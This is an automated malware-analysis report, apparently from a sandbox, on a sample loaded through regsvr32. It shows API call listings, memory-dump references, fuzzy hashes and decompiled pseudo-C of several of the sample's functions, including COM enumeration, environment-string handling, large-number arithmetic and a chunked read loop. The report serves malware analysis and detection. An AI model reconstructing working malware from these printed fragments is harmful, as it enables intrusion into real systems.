                                    • GetVersion.KERNEL32(?,00000001), ref: 001A671E
                                    • GetCurrentProcessId.KERNEL32(?,00000001), ref: 001A672D
                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 001A674A
                                    • GetLastError.KERNEL32(?,00000001), ref: 001A6769
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                    • String ID:
                                    • API String ID: 2270775618-0
                                    • Opcode ID: 44f01dd57443d58f91c27db9a50e74bf28bcaff82c9fd7e0b5f015165dbb649f
                                    • Instruction ID: e274a9da951048bea9a92e2229142d3fff5244eb1345c35370681363d2ba1799
                                    • Opcode Fuzzy Hash: 44f01dd57443d58f91c27db9a50e74bf28bcaff82c9fd7e0b5f015165dbb649f
                                    • Instruction Fuzzy Hash: 60F0BE78A54301DFD7508FB4AE09B263BB9AB07B80F54841AF106CA9E0D37188D0CF26
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C4810, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E2C4843
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E2C48FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                    • String ID: <X,n$csm
                                    • API String ID: 3480331319-4094644948
                                    • Opcode ID: 09d91c701d2a3e681ec5408f58fedfb9c7c05426af0ca75d769c9ef0f4190e1b
                                    • Instruction ID: 08fb18a6f927be6398a179a90e725409d78d065ad172983129a2113cbe43a03d
                                    • Opcode Fuzzy Hash: 09d91c701d2a3e681ec5408f58fedfb9c7c05426af0ca75d769c9ef0f4190e1b
                                    • Instruction Fuzzy Hash: C041E734D1015EABCF80CF98C844A9FBBB6BF45B28F108355D9159B351C7319A16CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C5E58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104), ref: 6E2C5E98
                                    • _free.LIBCMT ref: 6E2C5F63
                                    • _free.LIBCMT ref: 6E2C5F6D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                    • API String ID: 2506810119-3922119987
                                    • Opcode ID: be3c452401bdb698f369228116a307afaacdda58bea63885b77c7763ff0c0075
                                    • Instruction ID: e6dda1b7837dd63df333727df1ab53975525fe59812bb235a67d8629d6965e41
                                    • Opcode Fuzzy Hash: be3c452401bdb698f369228116a307afaacdda58bea63885b77c7763ff0c0075
                                    • Instruction Fuzzy Hash: 8431B57199421DAFDB91CFD9C884DDEBBFEEF8AB10B104256E80497240D7B08A41CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A2CA0, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 46%
                                    			E001A2CA0(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x1aa2d4; // 0x314d7d0
					_t5 = _t102 + 0x1ab038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x1a92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x1aa2d4; // 0x314d7d0
												_t28 = _t108 + 0x1ab0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x1aa2d4; // 0x314d7d0
														_t33 = _t78 + 0x1ab078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                    0x001a2ca5
                                    0x001a2cae
                                    0x001a2caf
                                    0x001a2cb3
                                    0x001a2cb9
                                    0x001a2cbf
                                    0x001a2cc8
                                    0x001a2cce
                                    0x001a2cd8
                                    0x001a2cda
                                    0x001a2ce0
                                    0x001a2ce5
                                    0x001a2cf0
                                    0x001a2cf8
                                    0x001a2cfb
                                    0x001a2e1e
                                    0x001a2d01
                                    0x001a2d01
                                    0x001a2d0e
                                    0x001a2d14
                                    0x001a2d1a
                                    0x001a2d1e
                                    0x001a2d24
                                    0x001a2d31
                                    0x001a2d35
                                    0x001a2d3b
                                    0x001a2d3e
                                    0x001a2d44
                                    0x001a2d4a
                                    0x001a2d50
                                    0x001a2d53
                                    0x001a2d56
                                    0x001a2d5c
                                    0x001a2d65
                                    0x001a2d6b
                                    0x001a2d6c
                                    0x001a2d6f
                                    0x001a2d70
                                    0x001a2d71
                                    0x001a2d79
                                    0x001a2d7a
                                    0x001a2d7b
                                    0x001a2d7d
                                    0x001a2d81
                                    0x001a2d85
                                    0x00000000
                                    0x00000000
                                    0x001a2d8b
                                    0x001a2d94
                                    0x001a2d9a
                                    0x001a2da4
                                    0x001a2da8
                                    0x001a2daa
                                    0x001a2db7
                                    0x001a2dbb
                                    0x001a2dc3
                                    0x001a2dc8
                                    0x001a2dda
                                    0x001a2ddc
                                    0x001a2de2
                                    0x001a2de2
                                    0x001a2deb
                                    0x001a2deb
                                    0x001a2ded
                                    0x001a2df3
                                    0x001a2df3
                                    0x001a2df6
                                    0x001a2dfc
                                    0x001a2dff
                                    0x001a2e08
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a2e08
                                    0x001a2d5c
                                    0x001a2d56
                                    0x001a2d3e
                                    0x001a2e0e
                                    0x001a2e0e
                                    0x001a2e14
                                    0x001a2e14
                                    0x001a2e1a
                                    0x001a2e1a
                                    0x001a2e23
                                    0x001a2e29
                                    0x001a2e29
                                    0x001a2ce5
                                    0x001a2e32

                                    APIs
                                    • SysAllocString.OLEAUT32(001A92B0), ref: 001A2CF0
                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 001A2DD2
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A2DEB
                                    • SysFreeString.OLEAUT32(?), ref: 001A2E1A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$Free$Alloclstrcmp
                                    • String ID:
                                    • API String ID: 1885612795-0
                                    • Opcode ID: ea73d0369aa37cffe52a585f0c7f983c866dc06c2db8b1c59b9785da0292c4d4
                                    • Instruction ID: 185f630b7f9a72dee381781528eb0a599b12ad393625f1e194cef705c6005742
                                    • Opcode Fuzzy Hash: ea73d0369aa37cffe52a585f0c7f983c866dc06c2db8b1c59b9785da0292c4d4
                                    • Instruction Fuzzy Hash: DC515E75D00519EFCB01DFA8C9889AEF7B9FF8A704B144598E915EB221D7319D41CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A211F, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SysAllocString.OLEAUT32(00000000), ref: 001A2160
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A2243
                                      • Part of subcall function 001A2CA0: SysAllocString.OLEAUT32(001A92B0), ref: 001A2CF0
                                    • SafeArrayDestroy.OLEAUT32(?), ref: 001A2297
                                    • SysFreeString.OLEAUT32(?), ref: 001A22A5
                                      • Part of subcall function 001A2B38: Sleep.KERNEL32(000001F4), ref: 001A2B80
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$AllocFree$ArrayDestroySafeSleep
                                    • String ID:
                                    • API String ID: 3193056040-0
                                    • Opcode ID: fdda6908ca1211b323384ce1314266bb6b7fc06e878e734a5b1064f013b0ef4f
                                    • Instruction ID: 042a19b6f013b59a7ef2786db2101a1ea971dc0675d14fd19b95e5b6ae789edd
                                    • Opcode Fuzzy Hash: fdda6908ca1211b323384ce1314266bb6b7fc06e878e734a5b1064f013b0ef4f
                                    • Instruction Fuzzy Hash: 1151317690020AEFCB11DFE8C8849EEB7B6FF89340B158869F505EB220D771AD45CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A1D8C, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 152stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E001A1D8C(void* __eflags, int _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				char* _v24;
				int _v28;
				void* _v40;
				char _v44;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void _v88;
				char _v92;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t53;
				void* _t55;
				void* _t67;
				void* _t76;
				WCHAR* _t80;
				intOrPtr _t82;

				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t42 =  *0x1aa2cc; // 0x32f9f00
				_t5 = _t42 + 0x48; // 0x32fa0a0
				_t82 =  *_t5;
				_t6 = _t42 + 0x4c; // 0x32fa0ad
				_v16 =  *_t6;
				_t44 =  *0x1aa2d4; // 0x314d7d0
				_t8 = _t44 + 0x1abdd0; // 0x410025
				_t80 = E001A564D(_t8);
				_v20 = _t80;
				if(_t80 == 0) {
					_t76 = 8;
					L24:
					return _t76;
				}
				if(StrCmpNIW(_t80, _a4, lstrlenW(_t80)) != 0) {
					_t76 = 1;
					L22:
					E001A77EC(_v20);
					goto L24;
				}
				if(E001A1FBC(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t53 = E001A5691(_t52,  *0x1aa38c);
				_v12 = _t53;
				if(_t53 == 0) {
					_t76 = 8;
					goto L19;
				} else {
					_t55 = E001A5691(_t53, _t82);
					_t84 = _t55;
					if(_t55 == 0) {
						_t76 = 8;
					} else {
						_t76 = E001A15D7(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88);
						_t55 = E001A77EC(_t84);
					}
					if(_t76 != 0) {
						L17:
						E001A77EC(_v12);
						L19:
						_t83 = _a4;
						if(_a4 != 0) {
							E001A44B9(_t83);
						}
						goto L22;
					} else {
						if(( *0x1aa2b8 & 0x00000001) == 0) {
							L14:
							E001A1C69(_v88, _v92, _v92,  *0x1aa2c8, 0);
							_t76 = E001A23B6(_v92,  &_v84,  &_v80, 0);
							if(_t76 == 0) {
								_v28 = _a4;
								_v24 =  &_v92;
								_t76 = E001A43C6( &_v44, 0);
							}
							E001A77EC(_v92);
							goto L17;
						}
						_t67 = E001A5691(_t55, _v16);
						_t86 = _t67;
						if(_t67 == 0) {
							_t76 = 8;
						} else {
							_t76 = E001A15D7(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
							E001A77EC(_t86);
						}
						if(_t76 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

























                                    0x001a1d9e
                                    0x001a1da1
                                    0x001a1da8
                                    0x001a1dae
                                    0x001a1daf
                                    0x001a1db0
                                    0x001a1db1
                                    0x001a1db2
                                    0x001a1db3
                                    0x001a1db8
                                    0x001a1db8
                                    0x001a1dbb
                                    0x001a1dbe
                                    0x001a1dc1
                                    0x001a1dc9
                                    0x001a1dd5
                                    0x001a1dd9
                                    0x001a1ddc
                                    0x001a1f11
                                    0x001a1f14
                                    0x001a1f18
                                    0x001a1f18
                                    0x001a1df6
                                    0x001a1f04
                                    0x001a1f05
                                    0x001a1f08
                                    0x00000000
                                    0x001a1f08
                                    0x001a1e08
                                    0x001a1e0a
                                    0x001a1e0a
                                    0x001a1e13
                                    0x001a1e1a
                                    0x001a1e1d
                                    0x001a1ef3
                                    0x00000000
                                    0x001a1e23
                                    0x001a1e24
                                    0x001a1e29
                                    0x001a1e32
                                    0x001a1e55
                                    0x001a1e34
                                    0x001a1e4a
                                    0x001a1e4c
                                    0x001a1e4c
                                    0x001a1e58
                                    0x001a1ee7
                                    0x001a1eea
                                    0x001a1ef4
                                    0x001a1ef4
                                    0x001a1ef9
                                    0x001a1efb
                                    0x001a1efb
                                    0x00000000
                                    0x001a1e5e
                                    0x001a1e65
                                    0x001a1e9b
                                    0x001a1eab
                                    0x001a1ec1
                                    0x001a1ec5
                                    0x001a1eca
                                    0x001a1ed0
                                    0x001a1edd
                                    0x001a1edd
                                    0x001a1ee2
                                    0x00000000
                                    0x001a1ee2
                                    0x001a1e6a
                                    0x001a1e6f
                                    0x001a1e73
                                    0x001a1e96
                                    0x001a1e75
                                    0x001a1e8b
                                    0x001a1e8d
                                    0x001a1e8d
                                    0x001a1e99
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a1e99
                                    0x001a1e58

                                    APIs
                                    • memset.NTDLL ref: 001A1DA1
                                      • Part of subcall function 001A564D: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,032FA0A0,00000000,001A1DD5,00410025,00000001,00000000,754B94D8), ref: 001A565E
                                      • Part of subcall function 001A564D: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 001A567B
                                    • lstrlenW.KERNEL32(00000000,00410025,00000001,00000000,754B94D8), ref: 001A1DE3
                                    • StrCmpNIW.SHLWAPI(00000000,001A5FD8,00000000), ref: 001A1DEE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EnvironmentExpandStrings$lstrlenmemset
                                    • String ID: EG@u~Bu
                                    • API String ID: 3817122888-1195135033
                                    • Opcode ID: 5b4a8889291cfbdd2be2c8bfb7d96436642c8b929f9eb9b0bfbdb866e403e3e1
                                    • Instruction ID: d05998c0720ef3fcf0345b2f1a71eae047ab6daba9bdf9bc95da1712eebcf4e7
                                    • Opcode Fuzzy Hash: 5b4a8889291cfbdd2be2c8bfb7d96436642c8b929f9eb9b0bfbdb866e403e3e1
                                    • Instruction Fuzzy Hash: 86416F7A900218BFCB12AFE4CC85DEEBBBDAF1B350F504426F905E6111D7759E488B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A67C4, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E001A67C4(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E001A4E19(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E001A430F(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E001A6C82(_t101,  &_v428, _a8, _t96 - _t81);
					E001A6C82(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E001A430F(_t101,  &E001AA188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E001A430F(_a16, _a4);
						E001A24AE(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L001A7DDC();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L001A7DD6();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E001A3BCC(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E001A4858(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E001A319B(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E001AA188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                    0x001a67c7
                                    0x001a67d3
                                    0x001a67d9
                                    0x001a67de
                                    0x001a67e2
                                    0x001a6954
                                    0x001a6958
                                    0x001a6958
                                    0x001a67e8
                                    0x001a67ec
                                    0x001a67f2
                                    0x001a67f3
                                    0x001a67fe
                                    0x001a6804
                                    0x001a6809
                                    0x001a680c
                                    0x001a6826
                                    0x001a6835
                                    0x001a6841
                                    0x001a684b
                                    0x001a6850
                                    0x001a6852
                                    0x001a6855
                                    0x001a690c
                                    0x001a6912
                                    0x001a6923
                                    0x001a6936
                                    0x001a694c
                                    0x00000000
                                    0x001a6951
                                    0x001a685e
                                    0x001a6865
                                    0x001a6869
                                    0x001a686f
                                    0x001a6871
                                    0x001a6873
                                    0x001a6875
                                    0x001a6877
                                    0x001a6881
                                    0x001a6886
                                    0x001a6888
                                    0x001a688a
                                    0x001a688b
                                    0x001a688c
                                    0x001a688d
                                    0x001a6894
                                    0x001a689b
                                    0x001a689e
                                    0x001a689e
                                    0x001a686b
                                    0x001a686b
                                    0x001a686b
                                    0x001a68a6
                                    0x001a68ae
                                    0x001a68ba
                                    0x001a68bf
                                    0x001a68bf
                                    0x001a68c4
                                    0x00000000
                                    0x00000000
                                    0x001a68c6
                                    0x001a68c9
                                    0x001a68d6
                                    0x00000000
                                    0x00000000
                                    0x001a68d8
                                    0x001a68d8
                                    0x001a68e5
                                    0x001a68bf
                                    0x001a68c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a68c4
                                    0x001a68ef
                                    0x001a68f2
                                    0x001a68f5
                                    0x001a68fc
                                    0x001a68fc
                                    0x001a6909
                                    0x00000000
                                    0x001a6909
                                    0x001a67f5
                                    0x001a67f9
                                    0x001a67fa
                                    0x001a67fc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a67fc
                                    0x00000000

                                    APIs
                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 001A6877
                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001A688D
                                    • memset.NTDLL ref: 001A6936
                                    • memset.NTDLL ref: 001A694C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memset$_allmul_aulldiv
                                    • String ID:
                                    • API String ID: 3041852380-0
                                    • Opcode ID: e667c44f839c6ea4f5e6baf6282770fe2c12bf05c9a4b0fc95d201c05da40f5e
                                    • Instruction ID: 7714359a5bba068aa381a33eba9587f5748d4378744b32ee0a13c0b3183143d6
                                    • Opcode Fuzzy Hash: e667c44f839c6ea4f5e6baf6282770fe2c12bf05c9a4b0fc95d201c05da40f5e
                                    • Instruction Fuzzy Hash: 6E41D035A00219AFDF10DF68CC81BEE7779EF66320F044569F819A7281DBB09E54CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C9964, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6E2C827C,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6E2C99B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2C9A3A
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2C9A4C
                                    • __freea.LIBCMT ref: 6E2C9A55
                                      • Part of subcall function 6E2C6950: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E2C6982
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: 44342ab8db0a3feb9f240d7a1ee46a472e2c4ee73e9466d24454c182e9969ec1
                                    • Instruction ID: 3e7429a5c37e17d31dde03fddbb90971db27e928f84029b3fb3f442235382afe
                                    • Opcode Fuzzy Hash: 44342ab8db0a3feb9f240d7a1ee46a472e2c4ee73e9466d24454c182e9969ec1
                                    • Instruction Fuzzy Hash: 0331B332A1050BAFDF55CFA5CC85DEE3BA6EB41B15F044668EC18D7140E735C964CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A4182, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 56%
                                    			E001A4182(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0x1aa144() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E001A77D7(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x1aa2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E001A77EC(_v20);
							if(_v8 == 0) {
								_v8 = E001A44D1(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
